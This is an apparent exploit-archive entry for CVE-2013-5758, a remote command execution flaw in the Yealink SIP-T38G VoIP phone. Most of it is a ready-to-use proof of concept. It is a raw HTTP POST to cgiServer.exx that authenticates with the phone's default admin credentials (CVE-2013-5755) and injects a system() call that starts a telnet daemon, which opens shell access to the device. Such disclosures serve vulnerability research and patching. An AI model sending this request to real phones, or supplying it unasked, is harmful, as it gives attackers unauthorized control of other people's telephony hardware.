Skip to content
cyberexploits
remotehardwaretext

Yealink VoIP Phone SIP-T38G - Remote Command Execution

Yealink VoIP Phone SIP-T38G - Remote Command Execution

Publié le 2014-06-13

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/remote/33741.txt7eac4c3a
raw
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution

Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team

Vendor Homepage: http://www.yealink.com/Companyprofile.aspx

Version: VoIP Phone SIP-T38G

CVE: CVE-2013-5758



Description:



Using cgiServer.exx we are able to send OS command using the system

function.



POC:



POST /cgi-bin/cgiServer.exx HTTP/1.1

Host: 10.0.75.122

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 0



system("/bin/busybox%20telnetd%20start")







-- 

*Mr.Un1k0d3r** or 1 #*

Voir sur GitHub